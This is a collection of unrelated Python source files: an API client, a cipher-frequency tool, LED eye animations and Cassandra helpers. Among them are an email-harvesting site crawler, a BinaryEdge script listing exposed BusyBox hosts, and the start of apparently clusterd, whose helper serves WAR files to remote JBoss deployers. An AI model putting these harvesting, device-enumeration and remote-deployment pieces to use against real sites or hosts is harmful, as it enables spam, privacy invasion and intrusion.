attachments: Optional[Union[list, Attachments]] = None,
):
"""
Create post
:param owner_id: id of page or group (group id must be negative 123 -> -123)
:param text:
:param parent_id:
:param timer:
:param attachments:
:return:
"""
if attachments is None:
attachments = []
if isinstance(attachments, Attachments):
attachments = attachments.get_attachments()
result = await self.request(
"POST",
path=f"posts/new",
json_data={
"ownerId": owner_id,
"text": text,
"parentId": parent_id,
"attachments": attachments,
"timer": timer,
},
)
return result
async def _upload(
self,
upload_type: str,
data: bytes,
content_type: str,
album_id: int = -3,
file_name: str = "blob",
):
"""
:param upload_type: photos|video
:param data:
:param content_type:
:param album_id:
:param file_name:
:return:
"""
headers = self.headers.copy()
form_data = aiohttp.FormData()
form_data.add_field(
"file", io.BytesIO(data), filename=file_name, content_type=content_type
)
form_data.add_field("album_id", str(album_id))
form_data = form_data()
headers.update(form_data.headers)
resp = await self.session.post(
f"https://upload.ton.place/{upload_type}/upload",
headers=headers,
data=form_data,
)
return json.loads(await resp.text())
async def upload_photo(
self, data: bytes, album_id: int = -3, file_name: str = "blob"
):
return await self._upload(
upload_type="photos",
data=data,
content_type="image/jpeg",
album_id=album_id,
file_name=file_name,
)
async def upload_video(
self, data: bytes, album_id: int = -3, file_name: str = "blob"
):
return await self._upload(
upload_type="video",
data=data,
content_type="video/mp4",
album_id=album_id,
file_name=file_name,
)
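    # Hypothetical usage sketch (the `api` client name and the attachment
    # shape are assumptions, not confirmed by this client):
    #   photo = await api.upload_photo(open("pic.jpg", "rb").read())
    #   await api.create_post(owner_id=123, text="hi", attachments=[photo])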
async def get_referrals(self):
result = await self.request(
"GET",
path=f"invite/friends",
)
return result
async def edit_profile(
self,
birth_day: int,
birth_month: int,
birth_year: int,
city_id: int,
country_id: int,
first_name: str,
last_name: str,
sex: int,
):
result = await self.request(
"POST",
path=f"profile/edit",
json_data={
"bDay": birth_day,
"bMonth": birth_month,
"bYear": birth_year,
"cityId": city_id,
"countryId": country_id,
"firstName": first_name,
"lastName": last_name,
"sex": sex,
},
)
return result
async def check_domain(self, domain: str):
"""
        Check whether the domain is available
:return:
"""
result = await self.request(
"GET", path=f"domain/check", json_data={"domain": domain}
)
return result
async def change_domain(self, domain: str):
result = await self.request(
"GET", path=f"profile/domain", json_data={"domain": domain}
)
return result
async def get_follow(
self,
user_id: int,
followers_type: str = "inbox",
start_from: int = 0,
query: str = "",
):
"""
:param user_id:
:param query:
:param start_from:
:param followers_type: inbox|outbox (followers|following)
:return:
"""
result = await self.request(
"GET",
path=f"followers/{user_id}/more",
json_data={
"query": query,
"type": followers_type,
"startFrom": start_from,
},
)
return result
async def close(self):
await self.session.close()
``` |
{
"source": "0x2342/tools",
"score": 4
} |
#### File: tools/freqAnalysis/freqAnalysis.py
```python
import sys
from operator import itemgetter
from collections import OrderedDict
f = open(sys.argv[1], 'r'); # Pass input file as parameter
s = str(f.read()); # Read input from file
s = s.replace(" ", "") # Strip whitespace
ETAOINSHRDLU = ["e","t","a","o","i","n","s","h","r","d","l","u"] # Most common single letters in the English language, in descending order
#bigrams = ["th"]
#trigrams = ["the"]
chars = {"A":0, "B":0, "C":0, "D":0, "E":0, "F":0, "G":0, "H":0, "I":0, "J":0, "K":0, "L":0, "M":0, "N":0, "O":0, "P":0, "Q":0, "R":0, "S":0, "T":0, "U":0, "V":0, "W":0, "X":0, "Y":0, "Z":0}
def simpleFA( data ):
for c in data:
if c in chars:
chars[c] += 1
#res = dict()
#for i in range(0,len(data)-1):
# c = data[i:i+1]
# if c in res:
# res[c] += 1
# else:
# res.update({c:1})
orderedChars=OrderedDict(sorted(chars.items(), key=lambda x:-x[1]))
return orderedChars
def bigrams( data ):
res = dict()
for i in range(0,len(data)-2):
bigr = data[i:i+2]
if bigr in res:
res[bigr] +=1
else:
res.update({bigr:1})
res=OrderedDict(sorted(res.items(), key=lambda x:-x[1]))
return res
def trigrams( data ):
res = dict()
for i in range(0,len(data)-3):
trigr = data[i:i+3]
if trigr in res:
res[trigr] += 1
else:
res.update({trigr:1})
res=OrderedDict(sorted(res.items(), key=lambda x:-x[1]))
return res
def substHeu( data ):
single = simpleFA(data)
bi = bigrams(data)
tri = trigrams(data)
print "Most common trigrams: " + tri.keys()[0] + "," + tri.keys()[1] + "," + tri.keys()[2]
print "Most common digrams: " + bi.keys()[0] + "," + bi.keys()[1] + "," + bi.keys()[2]
print "Most common characters: " + single.keys()[0] + "," + single.keys()[1] + "," + single.keys()[2]
match = ( str(tri.keys()[0][0]) + str(tri.keys()[0][1])) # Match most common bigram against first two letters of most common trigram
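    # e.g. if the top trigram is "QEK" and the top bigram is "QE", we assume
    # "QEK" -> "the" and "QE" -> "th" (classic English frequency heuristic)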
d = dict() # Dictionary to hold assumed character mappings. Every key and every value should be unique :-)
if match == str(bi.keys()[0]):
d.update({tri.keys()[0]:'the'})
d.update({tri.keys()[0][0]:'t'})
d.update({tri.keys()[0][1]:'h'})
d.update({tri.keys()[0][2]:'e'})
d.update({bi.keys()[0]:'th'})
d.update({bi.keys()[1]:'he'})
# Now compare against ETAOINSHRDLU
# Check whether we already have a mapping for elements from ETAOINSHRDLU and remove them
for k,v in d.items():
if v in ETAOINSHRDLU:
ETAOINSHRDLU.remove(v)
del single[k]
    #Now map the remnants of ETAOINSHRDLU to the most common remaining characters in the single dict
for i in range(0,len(ETAOINSHRDLU)):
d.update({single.keys()[i]:ETAOINSHRDLU[i]})
#print "Mapping: " + single.keys()[i] + "-> " + ETAOINSHRDLU[i]
#At this point I'd like to have d ordered by the length of key
d=OrderedDict(sorted(d.items(), key=lambda x: -len(x[0])))
print d
for k,v in d.items():
print "Replacing " + k + " with " + v
data = data.replace(k,v)
print data
substHeu(s)
f.close()
``` |
{
"source": "0x24bin/oh-my-rss",
"score": 2
} |
#### File: spiders/day/ttalk_spider.py
```python
from feed.spiders.spider import Spider
class TtalkSpider(Spider):
name = 'ttalk'
def __init__(self):
Spider.__init__(self,
start_urls=[
'https://www.ttalk.im/',
],
index_xpath="//div[@class='text-left']/a/@href",
article_title_xpath="//h1/text()",
article_content_xpath="//div[contains(@class, 'content')]",
index_limit_count=3,
)
``` |
{
"source": "0x24elk/ScaryPi",
"score": 3
} |
#### File: 0x24elk/ScaryPi/scarypi.py
```python
import sys
import datetime
import random
import time
from PIL import Image
from luma.core import cmdline
from luma.core.interface.serial import spi, noop
from luma.core.render import canvas
from luma.core.virtual import viewport
class Point(object):
"""A point, because a tuple is soo yesterday."""
def __init__(self, x, y):
self.x = x
self.y = y
def __str__(self):
return "(%s, %s)" % (self.x, self.y)
class Animation(object):
"""Interface for an animation."""
def __init__(self):
"""Creates a new animation."""
self.start = None # The start time, once begun.
self.done = False
def begin(self, now):
"""Starts the animation at now milliseconds."""
self.start = now
def tick(self, now):
"""Performs a step of the animation based on the current time."""
class LinearAnimation(Animation):
"""Based class for linear animations."""
def __init__(self, duration_ms):
"""Creates a new animation of length duration_ms milliseconds."""
Animation.__init__(self)
self.duration_ms = duration_ms
def tick(self, now):
"""Performs a step of the animation based on the current time."""
Animation.tick(self, now)
dt_timedelta = (now - self.start)
dt = dt_timedelta.total_seconds() * 1000
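        # e.g. a 0.25 s delta gives dt == 250.0 ms; _animate receives
        # the completion percentage dt / duration_ms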
if dt <= 0:
return # Bail if we're called too fast or going back in time.
if dt <= self.duration_ms:
self._animate(dt / self.duration_ms)
else:
self._animate(1.0)
self.done = True
def _animate(self, pct):
"""Overwrite in subclasses to performs a step, based on a percentage completion."""
class AnimationGroup(Animation):
"""Plays a group of Animations in parallel until all are done."""
def __init__(self, *args):
"""Initializes the animation with a list of animations."""
Animation.__init__(self)
self.animations = args
self.done = False
def begin(self, now):
Animation.begin(self, now)
for a in self.animations:
a.begin(now)
def tick(self, now):
Animation.tick(self, now)
all_done = True
for a in self.animations:
a.tick(now)
if not a.done:
all_done = False
self.done = all_done
class AnimationSequence(Animation):
"""Plays a set of Animations in sequence."""
def __init__(self, *args):
Animation.__init__(self)
self.animations = list(args)
self.active = None
def tick(self, now):
"""Advances the head animation in the queue, removing done ones."""
Animation.tick(self, now)
# End current animation, if done.
if self.active and self.active.done:
self.active = None
# Pop next animation from queue and start, if none.
if not self.active:
if self.animations:
self.active = self.animations.pop(0)
self.active.begin(now)
return
# No more animations => done.
if not self.active:
self.done = True
return
self.active.tick(now)
class Look(LinearAnimation):
"""An animation moving the pupil of an Eye."""
def __init__(self, eye, where, duration_ms=200):
"""Moves the eyeball to a given Point where."""
LinearAnimation.__init__(self, duration_ms)
self.eye = eye
self.origin = eye.pupil
self.dest = where
self.dx = self.dest.x - self.origin.x
self.dy = self.dest.y - self.origin.y
if self.dx == 0 and self.dy == 0:
self.done = True
def _animate(self, pct):
if self.done:
return
curr = Point(int(self.origin.x + (self.dx * pct)), int(self.origin.y + (self.dy * pct)))
self.eye._look(curr)
class Blink(LinearAnimation):
"""An animation blinking an Eye."""
def __init__(self, eye, duration_ms=500):
"""Blinks the eye in duration_ms"""
LinearAnimation.__init__(self, duration_ms)
self.eye = eye
self.eyelid = 0 # Offset of the eyelids, 0=open, 3=closed
def _animate(self, pct):
if self.done:
return
# Close eyelids 0->4 in first half of animation, then re-open.
if (pct < 0.5):
offset = 4 * (pct / 0.49) + 0.5
self.eye._eyelids(int(offset))
else:
offset = 4 - (4 * ((pct - 0.5) / 0.49) + 0.5)
self.eye._eyelids(int(offset))
# Ensure eyes fully open again at end of animation.
if pct >= 1.0:
self.eye._eyelids(-1)
return
class CrossEyes(AnimationSequence):
"""Crosses the eyes."""
def __init__(self, left, right, duration_ms=3000):
ms = duration_ms / 3
AnimationSequence.__init__(self,
AnimationGroup(left.look(Point(6, 4), ms), right.look(Point(2, 4), ms)),
Wait(ms),
AnimationGroup(left.look(Point(4, 4), ms), right.look(Point(4, 4), ms))
)
class MethEyes(AnimationSequence):
"""Inverse 'cross eyes', looking out."""
def __init__(self, left, right, duration_ms=3000):
ms = duration_ms / 3
AnimationSequence.__init__(self,
AnimationGroup(left.look(Point(2, 4), ms), right.look(Point(6, 4), ms)),
Wait(ms),
AnimationGroup(left.look(Point(4, 4), ms), right.look(Point(4, 4), ms))
)
class CrazyBlink(AnimationSequence):
"""Blinks left eye, then right."""
def __init__(self, left, right, duration_ms=1500):
ms = duration_ms / 2
AnimationSequence.__init__(self,
left.blink(ms),
right.blink(ms)
)
class LazyEye(AnimationSequence):
"""Lowers pupil of a single eye only."""
def __init__(self, eye, duration_ms=2000):
ms = duration_ms / 3
AnimationSequence.__init__(self,
eye.look(Point(4, 6), ms * 2), # Lower slowly
eye.look(Point(4, 4), ms), # Raise quickly
)
class CrazySpin(AnimationSequence):
"""'Spins' pupil horizontally with wraparound."""
def __init__(self, left, right, duration_ms=400):
times = 2
ms = duration_ms / (times*8)
a = []
# Just keep moving to the left, as the Eye class handles wrapping.
for i in range(0, times*8):
x = 4 - i
a.append(AnimationGroup(left.look(Point(x, 4), ms), right.look(Point(x, 4), ms)))
AnimationSequence.__init__(self, *a)
class RoundSpin(AnimationSequence):
"""Spins the eyeballs of both eyes in circles."""
def __init__(self, left, right, duration_ms=400):
times = 2
ms = duration_ms / (times*13 + 1)
a = [AnimationGroup(left.look(Point(6, 4), ms), right.look(Point(2, 4), ms))]
for i in range(times):
a = a + [
AnimationGroup(left.look(Point(6, 4), ms), right.look(Point(2, 4), ms)),
AnimationGroup(left.look(Point(6, 3), ms), right.look(Point(2, 3), ms)),
AnimationGroup(left.look(Point(5, 2), ms), right.look(Point(3, 2), ms)),
AnimationGroup(left.look(Point(4, 2), ms), right.look(Point(4, 2), ms)),
AnimationGroup(left.look(Point(3, 2), ms), right.look(Point(5, 2), ms)),
AnimationGroup(left.look(Point(2, 3), ms), right.look(Point(6, 3), ms)),
AnimationGroup(left.look(Point(2, 4), ms), right.look(Point(6, 4), ms)),
AnimationGroup(left.look(Point(2, 5), ms), right.look(Point(6, 5), ms)),
AnimationGroup(left.look(Point(3, 6), ms), right.look(Point(5, 6), ms)),
AnimationGroup(left.look(Point(4, 6), ms), right.look(Point(4, 6), ms)),
AnimationGroup(left.look(Point(5, 6), ms), right.look(Point(3, 6), ms)),
AnimationGroup(left.look(Point(6, 5), ms), right.look(Point(2, 5), ms)),
AnimationGroup(left.look(Point(6, 4), ms), right.look(Point(2, 4), ms))
]
AnimationSequence.__init__(self, *a)
class GlowEyes(LinearAnimation):
"""Glows the eyes; well, rather the device."""
def __init__(self, device, duration_ms=300):
"""Blinks the eye in duration_ms"""
LinearAnimation.__init__(self, duration_ms)
self.device = device
def _animate(self, pct):
if self.done:
return
# Increase contrast 30->150 in first half of animation, then bring down again.
if (pct < 0.5):
c = int(30 + 120 * (pct / 0.49))
self.device.contrast(c)
else:
c = int(150 - 120 * ((pct - 0.5) / 0.49))
self.device.contrast(c)
        # Ensure contrast is back at its resting level at the end of the animation.
if pct >= 1.0:
self.device.contrast(30)
class Wait(LinearAnimation):
"""An animation doing nothing."""
    def __init__(self, duration_ms=300):
"""Waits for duration_ms"""
LinearAnimation.__init__(self, duration_ms)
class Eye(object):
"""A single 8x8 eye we animate and draw on our LED matrix."""
# Basic eyeball template (without a pupil).
eye_ball = [
0b00111100,
0b01111110,
0b11111111,
0b11111111,
0b11111111,
0b11111111,
0b01111110,
0b00111100
]
def __init__(self):
"""Initializes the eye."""
self.pixels = bytearray(Eye.eye_ball)
# The center of the pupil, so 4,4 is looking straight ahead.
self.pupil = Point(4,4)
# The offset of the eyelid(s) from the top/bottom. < 0 for fully open.
self.eyelids = -1
def _on(self, x, y):
"""Flips the pixel at x,y on. Wraps if x/y out of bounds."""
y = y % 8
x = x % 8
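        # Set bit (7 - x) of row y, MSB = leftmost pixel;
        # e.g. x == 0 gives the mask 0b00000001 << 7 == 0b10000000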
self.pixels[y] = self.pixels[y] | (0b00000001 << (7 - x))
def _off(self, x, y):
"""Flips the pixel at x,y off. Wraps if x/y out of bounds."""
y = y % 8
x = x % 8
self.pixels[y] = self.pixels[y] & ~(0b00000001 << (7 - x))
def _row_on(self, y):
"""Flips the whole row at y on. Wraps if y out of bounds."""
y = y % len(self.pixels)
self.pixels[y] = 0b11111111
def _row_off(self, y):
"""Flips the whole row at y off. Wraps if y out of bounds."""
y = y % len(self.pixels)
self.pixels[y] = 0b00000000
def _look(self, pos):
"""Immediately moves the pupil of the eyeball to pos."""
self.pupil = pos
self.pupil.x = self.pupil.x % 8
self.pupil.y = self.pupil.y % 8
def _eyelids(self, offset):
"""Moves the eyelids to the given offset, -1=open, 3=closed."""
self.eyelids = max(-1, min(offset, 3))
def look(self, pos, duration_ms=300):
"""Returns an animation, moving the puil to pos in duration_ms."""
return Look(self, pos, duration_ms)
def blink(self, duration_ms=500):
"""Returns an animation, blinking the eye in duration_ms."""
return Blink(self, duration_ms)
def image(self):
"""Renders the current state of the eye into an 8x8 monochrome image."""
self.pixels = bytearray(Eye.eye_ball)
# Draw pupil
self._off(self.pupil.x-1,self.pupil.y-1)
self._off(self.pupil.x,self.pupil.y-1)
self._off(self.pupil.x-1,self.pupil.y)
self._off(self.pupil.x,self.pupil.y)
# Draw eyelids, if requested.
if self.eyelids >= 0:
            for i in range(0, self.eyelids + 1):
self._row_off(i)
self._row_off(7-i)
return Image.frombytes('1', (8, 8), bytes(self.pixels))
def get_device(actual_args):
parser = cmdline.create_parser(description='luma.examples arguments')
args = parser.parse_args(actual_args)
if args.config:
# load config from file
config = cmdline.load_config(args.config)
args = parser.parse_args(config + actual_args)
# create device
device = cmdline.create_device(args)
return device
# General animation tick
TICK_SECONDS = 0.1
def render(left, right, device):
"""Renders the current state of the eyes on device."""
with canvas(device) as draw:
draw.bitmap((0, 0), left.image(), fill="white")
draw.bitmap((8, 0), right.image(), fill="white")
def pick_effect(device, left, right):
i = random.randint(0, 6)
if i == 0:
return CrossEyes(left, right)
if i == 1:
return CrazySpin(left, right)
if i == 2:
return MethEyes(left, right)
if i == 3:
return CrazyBlink(left, right)
if i == 4:
return LazyEye(left)
if i == 5:
return RoundSpin(left, right)
return GlowEyes(device)
def animation_loop(device):
left = Eye()
right = Eye()
main_sequence = AnimationSequence()
while(True):
start = datetime.datetime.now()
# Insert the next round of animations, if queue empty.
if main_sequence.done:
animations = []
# Look to a random point
p = Point(random.randint(2,5), random.randint(2,5))
animations.append(
AnimationGroup(left.look(p), right.look(p)))
# Wait 2.5 - 3.5s
animations.append(Wait(random.randint(5,7) * 500))
# Maybe blink
if random.randint(0, 3) == 0:
animations.append(
AnimationGroup(left.blink(), right.blink()))
# Play an effect, if desired.
if random.randint(0, 6) == 0:
animations.append(pick_effect(device, left, right))
main_sequence = AnimationSequence(*animations)
# Animate
main_sequence.tick(start)
render(left, right, device)
# Sleep if we're going too fast.
elapsed = datetime.datetime.now() - start
sleeptime = max(TICK_SECONDS - elapsed.total_seconds(), 0)
time.sleep(sleeptime)
def main():
device = get_device(sys.argv[1:])
device.contrast(30)
animation_loop(device)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
pass
``` |
{
"source": "0x25/scrabe",
"score": 3
} |
#### File: 0x25/scrabe/scrabe.py
```python
import argparse
from multiprocessing import Pool
import requests
from bs4 import BeautifulSoup
import urllib.parse as urlparse
import os, sys, re
import socket
import validators
import time, random
def load_file(file):
''' read file line by line and output a list'''
if os.path.isfile(file):
with open(file) as f:
lines = f.read().splitlines()
return lines
else:
print(f"\033[0;31mERROR: file not exist [{file}]\033[0m")
sys.exit(1)
def check_url_format(url):
''' valide or reformat URL format. URL must start with http(s)'''
if url.find('http') != 0:
url = 'http://' + url
if validators.url(url) is True:
return url
else:
return False
def scrape_urls(site, blacklist, max_depth = 1, cur_depth=0, urls=[],emails=[]):
''' recursive function to grep url from url'''
pid = os.getpid()
url = urlparse.urlparse(site)
status_code = None
base_url = url.scheme + '://' + url.netloc
if url.path != '':
        base_url = base_url + os.path.dirname(url.path) + '/'  # may produce '//' in some cases
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
try:
r = requests.get(site, headers=headers)
status_code = r.status_code
except:
print(f" WARNING: [{pid}] request fail {site}")
return {'urls': urls, 'emails': emails} # maybe ...
print(f" INFO: [{pid}] HTTP status code [{status_code}]")
s = BeautifulSoup(r.text,"html.parser")
mails = scrap_email(r.text)
for mail in mails:
if mail not in emails:
emails.append(mail)
nb_emails = len(emails)
print(f" Info: pid[{pid}] depth[{cur_depth}] emails[{nb_emails}] {site}")
if cur_depth >= max_depth: # exit: to mutch iterration
print(f" INFO: pid[{pid}] max depth {cur_depth} {max_depth}")
return {'urls': urls, 'emails': emails}
for a in s.find_all("a", href=True):
site = format_url(a['href'],base_url)
if site is not False:
if site not in urls and check_extension(site, blacklist):
urls.append(site)
time.sleep(random.randint(1,4)/5) # no dos
scrape_urls(site, blacklist, max_depth, cur_depth+1, urls, emails)
return {'urls': urls, 'emails': emails}
def format_url(url_tmp,url_valide):
    ''' build URL and check it is in domain. url_valide needs an http prefix'''
url_temp_raw = url_tmp
url_valide_raw = url_valide
url_tmp = urlparse.urlparse(url_tmp)
url_valide = urlparse.urlparse(url_valide)
if url_tmp.netloc == '' or url_tmp.netloc == url_valide.netloc:
if url_tmp.path != '' and url_tmp.path.find('(') == -1 and url_tmp.scheme != 'mailto':
url_join = urlparse.urljoin(url_valide_raw, url_temp_raw)
return url_join
return False
def check_redirection(url, max_redirection=5):
''' check if url is redirect and return value'''
count = 0
while count < max_redirection:
count = count + 1
try:
req = requests.head(url, timeout=(2, 5), allow_redirects=False)
except:
print("\033[0;31mWARNING: check_redirection error (SSL/Timeout ...)\033[0m")
return False
if 'location' in req.headers:
url = req.headers['location']
if count == max_redirection:
print("\033[0;31mWARNING: To mutch redirection\033[0m")
return False
else:
break
return url
def valid_domain(url):
''' ns lookup to resolv domain to IP'''
url = urlparse.urlparse(url)
domain = url.netloc
try:
s = socket.getaddrinfo(domain,0,2,0,0)
return True
except:
print("\033[0;31mWARNING: domain resolution fail\033[0m")
return False
def scrap_email(txt):
''' scrap mail on txt'''
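    # e.g. "contact: bob@example.com, logo@site.png" -> ['bob@example.com']
    # (the lookahead rejects image filenames that look like addresses)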
    out = re.findall(r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.(?!png|jpg|gif)[A-Za-z]{2,}\b", txt, re.I)
return out
def write_to(file,values):
''' Write list to file line by line'''
if isinstance(values, list):
try:
f = open(file, "w")
for value in values:
f.write(f"{value}\n")
f.close()
return True
except:
print("\033[0;31mWARNING: Fail to write file\033[0m")
return False
else:
print('\033[0;31mWARNING: Need a list, wrong type\033[0m')
return False
def check_extension(url,blacklist=[]):
''' check if extension is in blacklist. need http prefix'''
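    # e.g. check_extension("http://x/doc.pdf", ['.pdf']) -> False (blacklisted)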
path = urlparse.urlparse(url).path
if os.path.splitext(path)[1]:
if os.path.splitext(path)[1] in blacklist:
return False
else:
return True
else:
return True # no extension
def scrap(datas):
''' scrap url '''
pid = os.getpid()
url = datas['url']
folder = datas['out']
blacklist = datas['blacklist']
max_depth = datas['max_depth']
print(f"\033[0;32mINFO [{pid}] Start {url}\033[0m")
check_url = check_url_format(url)
if check_url is False:
print(f"\033[0;31mWARNING: [{pid}] invalid URL [{url}]\033[0m")
else:
if valid_domain(check_url):
rurl = check_redirection(check_url)
if rurl is not False:
if check_url not in rurl:
print(f"\033[0;32mINFO [{pid}] reddirection {check_url} > {rurl}\033[0m")
else:
print(f"\033[0;32mINFO [{pid}] Scrap {rurl}\033[0m")
file = urlparse.urlparse(rurl).hostname + '.txt'
path = os.path.join(folder,file)
if os.path.isfile(path) is False:
#scrap Url
result = scrape_urls(rurl,blacklist,max_depth,0,[],[])
mails = result['emails']
# write emails in file
write_to(path,mails)
else:
print(f"\033[0;32mINFO [{pid}] File already exist {path}")
else:
print(f"\033[0;31mWARNING: [{pid}] request error {check_url}\033[0m")
else:
print(f"\033[0;31mWARNING: [{pid}] name resolution error {check_url}\033[0m")
print(f'\033[0;32mINFO: [{pid}] END {check_url}\033[0m')
def main():
""" main code """
threads = 4
file = 'scrabe.txt'
folder = 'out'
blacklist = ['.pdf','.xls','.xlsx','.pptx','.doc','.docx','.docm','.jpg','.jpeg','.png','.gif','.tiff']
max_depth = 1
description = 'Scrap email from URLs'
parser = argparse.ArgumentParser(description=description)
    parser.add_argument('-t','--threads', type=int, default=threads, help='number of concurrent threads (default: 4)')
    parser.add_argument('-f','--file', default=file, help='file with one URL per line. Best to prefix URLs with http/https (default: scrabe.txt)')
    parser.add_argument('-o','--out', default=folder, help='folder to save output (default: out)')
    parser.add_argument('-m','--max', default=max_depth, help='set recursive depth (default: 1)')
args = parser.parse_args()
threads = args.threads
file = args.file
folder = args.out
max_depth = int(args.max)
urls = load_file(file)
print(f"\033[0;32mINFO: Load {len(urls)} from {file}\033[0m")
print(f"\033[0;32mINFO: Extension blacklist: {blacklist}\033[0m")
if not os.path.exists(folder):
os.mkdir(folder)
# deduplicate
urls = list(set(urls))
jobs = []
for url in urls:
jobs.append({'out':folder, 'url':url, 'blacklist': blacklist, 'max_depth': max_depth})
p = Pool(threads)
p.map(scrap,jobs)
p.close()
p.join()
# main
if __name__ == '__main__':
main()
``` |
{
"source": "0x26res/cassarrow",
"score": 2
} |
#### File: cassarrow/scripts/dump_test_data.py
```python
import pathlib
import cassandra
import cassandra.cluster
from cassandra.protocol import _ProtocolHandler
SELECT_QUERIES = {
"time_series": (
"SELECT * FROM cassarrow.time_series WHERE event_date = '2019-10-02'"
),
"simple_primitives": "SELECT * FROM cassarrow.simple_primitives",
"simple_map": "SELECT * FROM cassarrow.simple_map",
}
def create_dump_select_protocol_handler(destination: pathlib.Path):
class DumpProtocolHandler(_ProtocolHandler):
@classmethod
def decode_message(
cls,
protocol_version,
user_type_map,
stream_id,
flags,
opcode,
body,
decompressor,
result_metadata,
):
stream_destination = destination / f"{stream_id:04}.bin"
with stream_destination.open("wb") as fp:
fp.write(body)
print(f"Saved {len(body)} to {stream_destination}")
return super().decode_message(
protocol_version,
user_type_map,
stream_id,
flags,
opcode,
body,
decompressor,
result_metadata,
)
return DumpProtocolHandler
def dump_select_query(destination: pathlib.Path, query: str):
cluster = cassandra.cluster.Cluster()
with cluster.connect("cassarrow") as connection:
assert query.startswith("SELECT *")
json_query = query.replace("SELECT *", "SELECT JSON *")
json = connection.execute(json_query)
with (destination / "all.jsonl" "").open("w") as fp:
for payload in json:
fp.write(payload.json)
fp.write("\n")
connection.client_protocol_handler = create_dump_select_protocol_handler(
destination
)
results = connection.execute(query)
print(destination, len(list(results)))
def dump_all():
for destination, query in SELECT_QUERIES.items():
actual_destination = pathlib.Path("tests/select") / destination
actual_destination.mkdir(parents=True, exist_ok=True)
dump_select_query(actual_destination, query)
if __name__ == "__main__":
dump_all()
```
#### File: 0x26res/cassarrow/setup.py
```python
import os
import pathlib
import pyarrow
from pybind11.setup_helpers import Pybind11Extension, build_ext
from setuptools import setup
__version__ = "0.1.2"
ROOT = pathlib.Path(__file__).parent
README = (ROOT / "README.md").read_text()
USE_CXX11_ABI = os.environ.get("USE_CXX11_ABI", "0")
def get_extension():
pyarrow.create_library_symlinks()
source_directory = ROOT / "cpp" / "src"
extension = Pybind11Extension(
name="_cassarrow",
sources=[
str(source_directory / "cassarrow/bindings.cpp"),
str(source_directory / "cassarrow/cassarrow.cpp"),
],
define_macros=[("VERSION_INFO", __version__)],
cxx_std=11,
)
if USE_CXX11_ABI is not None:
extension.extra_compile_args.append(f"-D_GLIBCXX_USE_CXX11_ABI={USE_CXX11_ABI}")
extension.extra_compile_args.append(f"-I{source_directory}")
extension.extra_compile_args.append(f"-I{pyarrow.get_include()}")
for library_dir in pyarrow.get_library_dirs():
extension.extra_link_args.append(f"-L{library_dir}")
for library in pyarrow.get_libraries():
extension.extra_link_args.append(f"-l{library}")
return extension
ext_modules = [get_extension()]
setup(
name="cassarrow",
description="Apache Arrow adapter for the Cassandra python driver",
long_description=README,
long_description_content_type="text/markdown",
url="https://github.com/0x26res/cassarrow",
author="0x26res",
author_email="<EMAIL>",
version=__version__,
classifiers=[
"License :: OSI Approved :: Apache Software License",
"Development Status :: 4 - Beta",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: C++",
"Topic :: Software Development :: Libraries :: Python Modules",
"Natural Language :: English",
],
packages=["cassarrow"],
ext_modules=ext_modules,
package_dir={"": "./"},
install_requires=[
"setuptools>=42",
"wheel",
"pybind11>=2.9.0",
"pyarrow>=7.0.0",
"cassandra-driver",
],
extras_require={"test": ["pytest", "pandas", "tabulate"]},
cmdclass={"build_ext": build_ext},
zip_safe=False,
python_requires=">=3.9",
)
```
#### File: cassarrow/tests/fixtures.py
```python
import typing
import cassandra.cluster
import pytest
import cassarrow
@pytest.fixture()
def cluster() -> cassandra.cluster.Cluster:
return cassandra.cluster.Cluster()
@pytest.fixture()
def session(
cluster: cassandra.cluster.Cluster,
) -> typing.Iterator[cassandra.cluster.Session]:
with cluster.connect("cassarrow") as s:
yield s
@pytest.fixture()
def cassarrow_session(
session: cassandra.cluster.Session,
) -> typing.Iterator[cassandra.cluster.Session]:
with cassarrow.install_cassarrow(session) as s:
yield s
``` |
{
"source": "0x27/be-utils",
"score": 3
} |
#### File: 0x27/be-utils/example_page_iter.py
```python
from pybinaryedge import BinaryEdge
import argparse
import math
import sys
API_KEY = ""
def iter_example(limit=None, count=False):
# ok, we need to do some more advanced science here to iterate over page=?
be = BinaryEdge(API_KEY)
search = 'product:"BUSYBOX" country:"IT"'
results = be.host_search(search)
    pages_needed = math.ceil(results['total']/20.0) # round UP the page count so no results are missed
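    # e.g. 41 results -> ceil(41/20.0) == 3 pages (20 + 20 + 1)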
if count == True:
print "Results: %d" %(results['total'])
print "Will need to get %d pages..." %(pages_needed)
return
# now we need a query loop. this is horrible.
if limit != None:
pages_needed = limit # add limiting...
if pages_needed > 500:
pages_needed = 500 # sanity check for API limits!
page = 1
while page <= pages_needed:
results = be.host_search(search, page=page)
page+=1
for ip in results['events']:
print "%s:%s" %(ip['target']['ip'], ip['target']['port'])
def main():
    parser = argparse.ArgumentParser(description='BinaryEdge host_search pagination example')
parser.add_argument('-c', action='store_true', help='Count results instead of printing some IPs')
parser.add_argument('-l', type=int, help='Page limit, for saving credits!')
args = parser.parse_args()
if args.c:
iter_example(limit=None ,count=True)
else:
# we run with it...
if args.l: # hope you limited it!
iter_example(limit=args.l, count=False)
else: # danger will robinson!
iter_example(limit=None, count=False)
if __name__ == "__main__":
main()
``` |
{
"source": "0x27/clusterd",
"score": 3
} |
#### File: src/core/auxiliary.py
```python
class Auxiliary(object):
def __init__(self):
self.name = None # name of the module
self.versions = [] # supported versions
self.flag = None # CLI flag
def check(self, fingerprint):
""" Given the fingerprint of a remote service, check whether this
module is relevant.
True for valid, False for not
"""
raise NotImplementedError
def run(self, fingerengine, fingerprint):
""" Initiates the module
"""
raise NotImplementedError
```
#### File: src/module/deploy_utils.py
```python
from src.platform.weblogic.interfaces import WINTERFACES
from time import sleep
from subprocess import Popen, PIPE, check_output,STDOUT
from requests import get
from signal import SIGINT
from os import kill, system
from sys import stdout
from log import LOG
import importlib
import pkgutil
import state
import utility
def _serve(war_file = None):
""" Launch a SimpleHTTPServer listener to serve up our WAR file
to the requesting host. This is used primarily to serve a WAR
to JBoss' jmx_deployer.
If war_file is provided, this will make a copy of this file into
our temp dir and remove it once its been completed.
"""
try:
if war_file:
system("cp %s %s 2>/dev/null" % (war_file, state.serve_dir))
proc = Popen(["python", "-m", "SimpleHTTPServer", str(state.external_port)],
stdout=PIPE, stderr=PIPE, cwd=state.serve_dir)
while 'GET' not in proc.stderr.readline():
sleep(1.0)
